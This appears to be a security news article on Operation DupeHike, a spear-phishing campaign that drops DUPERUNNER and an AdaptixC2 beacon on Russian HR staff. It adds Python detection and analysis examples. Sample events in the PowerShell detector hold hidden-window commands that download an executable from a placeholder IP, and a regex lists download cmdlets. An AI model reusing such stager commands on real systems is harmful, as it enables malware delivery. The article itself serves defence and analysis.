A sophisticated cyberattack campaign named Operation DupeHike is actively targeting Russian corporations, with a particular focus on employees in human resources, payroll, and administrative departments. The threat group UNG0902 is reportedly behind this operation, using carefully crafted decoy documents about employee bonuses and internal financial policies to deploy a novel malware ecosystem onto victims' systems.
The campaign was identified by Seqrite security analysts after a malicious ZIP archive was discovered on VirusTotal on November 21, 2025. The attackers demonstrate a nuanced understanding of Russian corporate HR practices, creating convincing social engineering lures. These lures mimic realistic bonus structures, referencing Russia’s Labor Code and detailing bonus rates, such as fifteen percent of the annual salary, to effectively target personnel in financial roles.
Infection Mechanism and Technical Breakdown of Operation DupeHike
The attack chain is a three-stage process that begins when a victim opens a malicious LNK (shortcut) file. Spear-phishing emails deliver ZIP archives, often named “Премия 2025.zip” (“Bonus 2025.zip”), containing these LNK files. The shortcuts pose as PDF documents, using double-extension filenames such as “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk”; because Windows hides known extensions by default, recipients see only “.pdf” and open them.
When the LNK file is opened, it launches PowerShell with the abbreviated switches -NoNI, -nop, and -w (short forms of -NonInteractive, -NoProfile, and -WindowStyle Hidden), so no console window appears to alert the user. The script then uses Invoke-WebRequest to download the second-stage implant, known as DUPERUNNER, from an attacker-controlled server at 46.149.71.230.
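The stager described above leaves a distinctive process-creation record: powershell.exe with a hidden window, profile and interaction suppressed, and a download cmdlet pointed at a bare IP address. The following detection logic is an added example written for this article, not code from Seqrite or from the campaign; it resolves the abbreviated switches the way powershell.exe does (documented aliases, then any unambiguous prefix) and scores constructed sample events. The sample command lines, paths and the documentation address 203.0.113.10 are assumptions, not values from the report.

```python
import re

# Short forms of powershell.exe parameters, resolved as powershell.exe resolves them:
# documented aliases first, then any unambiguous case-insensitive prefix.
# -NoNI -> -NonInteractive, -nop -> -NoProfile, -w -> -WindowStyle (the three
# switches the DupeHike LNK files use).
PS_PARAMS = [
    "NonInteractive", "NoProfile", "WindowStyle", "ExecutionPolicy",
    "EncodedCommand", "Command", "File", "NoLogo", "NoExit", "Sta", "Mta",
    "Version", "InputFormat", "OutputFormat", "ConfigurationName",
]
PS_ALIASES = {
    "w": "WindowStyle", "nop": "NoProfile", "noni": "NonInteractive",
    "c": "Command", "e": "EncodedCommand", "ec": "EncodedCommand",
    "ep": "ExecutionPolicy", "f": "File",
}

# Common PowerShell download primitives (cmdlets, their aliases, .NET WebClient, BITS).
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b|"
    r"net\.webclient|downloadfile|downloadstring|start-bitstransfer)", re.I)
# A URL whose host is a bare IPv4 address rather than a domain, as in the campaign's stager.
RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/", re.I)

# Constructed process-creation records shaped like EDR/Sysmon "process create" data.
# 203.0.113.10 is a documentation address, not the campaign's server.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoNI -nop -w hidden Invoke-WebRequest -Uri http://203.0.113.10/update.exe -OutFile $env:TEMP\upd.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -w hidden -nop -noni -c "iwr 'http://203.0.113.10/a' -OutFile x.exe"'''},
]


def canonical_param(token: str):
    """Map an abbreviated switch (without its dash) to the full parameter name, or None."""
    low = token.lower()
    if low in PS_ALIASES:
        return PS_ALIASES[low]
    matches = [p for p in PS_PARAMS if p.lower().startswith(low)]
    return matches[0] if len(matches) == 1 else None   # None: unknown or ambiguous


def parse_switches(cmdline: str) -> dict:
    """Return {FullParameterName: following-value-or-True} for every switch in the command line."""
    tokens = cmdline.split()
    found = {}
    for i, tok in enumerate(tokens):
        if len(tok) < 2 or tok[0] not in "-/":
            continue
        name = canonical_param(tok[1:])
        if name is None:
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        found[name] = nxt if nxt and nxt[0] not in "-/" else True
    return found


def assess(event: dict) -> dict:
    """Score one process-creation event against the hidden-PowerShell-downloader pattern."""
    cmd = event["cmdline"]
    switches = parse_switches(cmd)
    hidden = str(switches.get("WindowStyle", "")).lower().startswith("h")
    quiet = "NoProfile" in switches or "NonInteractive" in switches
    downloads = DOWNLOAD_PRIMITIVES.search(cmd) is not None
    raw_ip = RAW_IP_URL.search(cmd)
    reasons = []
    if hidden:
        reasons.append("window hidden (-WindowStyle Hidden)")
    if quiet:
        reasons.append("profile/interaction suppressed (-NoProfile or -NonInteractive)")
    if downloads:
        reasons.append("download primitive in command line")
    if raw_ip:
        reasons.append(f"download from bare IP {raw_ip.group(1)}")
    if event["parent"].lower().endswith("explorer.exe"):
        reasons.append("parent is explorer.exe (consistent with a double-clicked LNK)")
    # A hidden window plus a download is the core of the stager; the other signals raise confidence.
    return {"suspicious": hidden and downloads, "reasons": reasons,
            "download_host": raw_ip.group(1) if raw_ip else None}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(assess(ev))
```

Prefix resolution matters because string-matching rules that look only for "-WindowStyle Hidden" miss "-w hidden" and "-win h"; normalising the switches first lets one rule cover every spelling. The bare-IP check is a useful secondary signal on its own, since legitimate administrative scripts rarely fetch executables from an address with no hostname.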
DUPERUNNER, a compiled C++ implant, handles reconnaissance and process injection. According to Seqrite’s analysis, it carries several functions aimed at establishing persistence on the compromised host and evading security controls. It enumerates running processes looking for explorer.exe, notepad.exe, and msedge.exe, which it uses as injection targets.
At the same time, DUPERUNNER downloads decoy PDF documents and displays them to the user. This creates the appearance of a legitimate document being opened while the malicious activity continues in the background; pairing deception with stealth in this way is a hallmark of advanced persistent threats.
In the final stage, DUPERUNNER uses remote thread injection to place the ultimate payload, an AdaptixC2 beacon, into one of those target processes. The command-and-control (C2) beacon communicates with the attackers’ infrastructure over HTTP POST requests, giving them the ability to execute remote commands and exfiltrate sensitive data from the compromised network.
To further hinder analysis, the AdaptixC2 beacon resolves the Windows APIs it needs at runtime from djb2-style hashes of their names instead of importing them by name, so neither its import table nor its strings reveal which functions it uses, and signatures keyed on those names do not fire. The sophistication of this mechanism highlights the evolving tactics of the UNG0902 threat group.
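API hashing is only opaque until an analyst precomputes the hashes of every export the loader might want and looks the constants up. The following helper is an added example for this article, not code from Seqrite or from the beacon; it implements classic djb2 (seed 5381, h = h * 33 + c, wrapped to 32 bits) together with the usual tweaks (xor variant, custom seed, case folding), builds a hash-to-name table, and tries the variants against a set of observed constants. The export list is a constructed sample, and no hash values here come from the report.

```python
from typing import Dict, Iterable, Optional


def djb2(name: str, seed: int = 5381, xor: bool = False, fold_case: bool = False) -> int:
    """Bernstein djb2 over the ASCII bytes of `name`, wrapped to 32 bits.

    Additive form: h = h * 33 + c.  The xor form (h = h * 33 ^ c), a custom seed and
    case folding are the common loader tweaks; they are exposed so the analyst can
    match whatever constants the disassembly shows.
    """
    data = (name.lower() if fold_case else name).encode("ascii")
    h = seed
    for c in data:
        h = ((h * 33) ^ c) if xor else (h * 33 + c)
        h &= 0xFFFFFFFF
    return h


# Constructed list of export names a loader typically resolves; in practice, feed the
# full export tables of kernel32/ntdll/wininet/winhttp from a PE parser.
SAMPLE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "OpenProcess", "VirtualAllocEx",
    "WriteProcessMemory", "CreateRemoteThread", "VirtualProtect",
    "InternetOpenA", "HttpSendRequestA", "WinHttpSendRequest",
]


def build_table(names: Iterable[str], **variant) -> Dict[int, str]:
    """Precompute hash -> name for one djb2 variant (the analyst's lookup table)."""
    return {djb2(n, **variant): n for n in names}


def resolve(observed: Iterable[int], table: Dict[int, str]) -> Dict[int, Optional[str]]:
    """Map hash constants lifted from a sample back to API names; None means not in the table."""
    return {h: table.get(h) for h in observed}


def guess_variant(observed: Iterable[int], names: Iterable[str]) -> Optional[dict]:
    """Try the common djb2 tweaks and return the first one whose table explains every hash."""
    names = list(names)
    observed = list(observed)
    for xor in (False, True):
        for fold_case in (False, True):
            variant = {"xor": xor, "fold_case": fold_case}
            if all(h in build_table(names, **variant) for h in observed):
                return variant
    return None


if __name__ == "__main__":
    # Stand-alone demo: pretend these constants were lifted from a sample's resolver.
    lifted = [djb2("CreateRemoteThread"), djb2("WriteProcessMemory"), 0x12345678]
    table = build_table(SAMPLE_EXPORTS)
    print(guess_variant(lifted[:2], SAMPLE_EXPORTS))
    print(resolve(lifted, table))
```

Once the variant is known, the resolved names are what a detection engineer wants in a signature: a YARA rule can match the hash constants themselves (they are static bytes in the binary even though the API names are not), and the resolved list documents the beacon's capabilities, here injection and HTTP client functions, for the analysis report.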
Configuration artifacts extracted by Seqrite researchers revealed key indicators of compromise, including beacon identifiers and C2 infrastructure details. That infrastructure is hosted on servers in AS48282 (VDSINA-AS) and AS9123 (TIMEWEB-AS). The attackers have also changed port configurations over time, initially using port 80 for implant delivery and later switching to port 443 for the final beacon traffic, suggesting continuous refinement of their attack infrastructure.
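The injection and beaconing stages described above produce two host telemetry events that are far more telling together than apart: a CreateRemoteThread into explorer.exe, notepad.exe or msedge.exe, followed shortly by that same process opening a socket to the C2. The correlation below is an added example written for this article, not code from Seqrite; it replays constructed events shaped like Sysmon Event ID 8 (CreateRemoteThread) and Event ID 3 (NetworkConnect), remembers which processes were injected, and flags their subsequent traffic. The only value taken from the report is the delivery address 46.149.71.230; the file names, PIDs, timestamps, the 30-minute window and the documentation address 198.51.100.7 are assumptions.

```python
from datetime import datetime, timedelta
import ntpath

INJECTION_TARGETS = {"explorer.exe", "notepad.exe", "msedge.exe"}  # processes the report names as injection targets
KNOWN_C2_IPS = {"46.149.71.230"}        # delivery host from the report; extend with the beacon C2s from the IoC list
NO_NETWORK_BASELINE = {"notepad.exe"}   # processes with no legitimate reason to open sockets
WINDOW = timedelta(minutes=30)          # assumed: how long after an injection a target's traffic stays suspect

# Constructed events shaped like Sysmon Event ID 8 (CreateRemoteThread) and
# Event ID 3 (NetworkConnect); file names, PIDs and times are invented.
SAMPLE_EVENTS = [
    {"t": "2025-11-21T10:00:05", "id": 8, "src_image": r"C:\Users\u\AppData\Local\Temp\stage2.exe",
     "src_pid": 4120, "tgt_image": r"C:\Windows\System32\notepad.exe", "tgt_pid": 5320},
    {"t": "2025-11-21T10:00:09", "id": 3, "image": r"C:\Windows\System32\notepad.exe",
     "pid": 5320, "dst_ip": "46.149.71.230", "dst_port": 443},
    {"t": "2025-11-21T10:03:00", "id": 3, "image": r"C:\Program Files\Microsoft\Edge\msedge.exe",
     "pid": 7001, "dst_ip": "198.51.100.7", "dst_port": 443},
    {"t": "2025-11-21T11:00:00", "id": 3, "image": r"C:\Windows\System32\notepad.exe",
     "pid": 5320, "dst_ip": "46.149.71.230", "dst_port": 443},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def correlate(events):
    """Replay events in time order; remember injected processes, then judge their traffic."""
    # target pid -> (time, injecting image, target is a DupeHike-style process).
    # Production code should key on Sysmon's ProcessGuid, since PIDs are reused.
    injected = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        t = datetime.fromisoformat(ev["t"])
        if ev["id"] == 8:
            injected[ev["tgt_pid"]] = (t, ev["src_image"], basename(ev["tgt_image"]) in INJECTION_TARGETS)
        elif ev["id"] == 3:
            reasons = []
            hit = injected.get(ev["pid"])
            if hit and t - hit[0] <= WINDOW:
                tag = " (a DupeHike-style target)" if hit[2] else ""
                reasons.append(f"socket from process injected by {basename(hit[1])}{tag}")
            if ev["dst_ip"] in KNOWN_C2_IPS:
                reasons.append("destination is a known campaign address")
            if basename(ev["image"]) in NO_NETWORK_BASELINE:
                reasons.append("process has no legitimate network use")
            if reasons:
                alerts.append({"time": ev["t"], "image": basename(ev["image"]), "pid": ev["pid"],
                               "dst": f"{ev['dst_ip']}:{ev['dst_port']}", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The alert keeps the destination port because the report notes the operators moved from port 80 to 443 between stages; the injection-then-socket correlation is what makes the rule hold up when the indicators change, since explorer.exe and msedge.exe talk to the internet constantly and an IP list alone would age out quickly, while a process that was just the target of a remote thread and then reaches out to a new address is suspicious regardless of the address.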
This ongoing campaign signifies a disturbing trend in the cyber threat landscape, where highly sophisticated social engineering tactics are being combined with advanced malware capabilities. The targeting of critical administrative functions within Russian corporations poses a significant risk to business continuity and data security. Organizations are advised to remain vigilant and enhance their cybersecurity defenses to mitigate the impact of such evolving threats as Operation DupeHike.

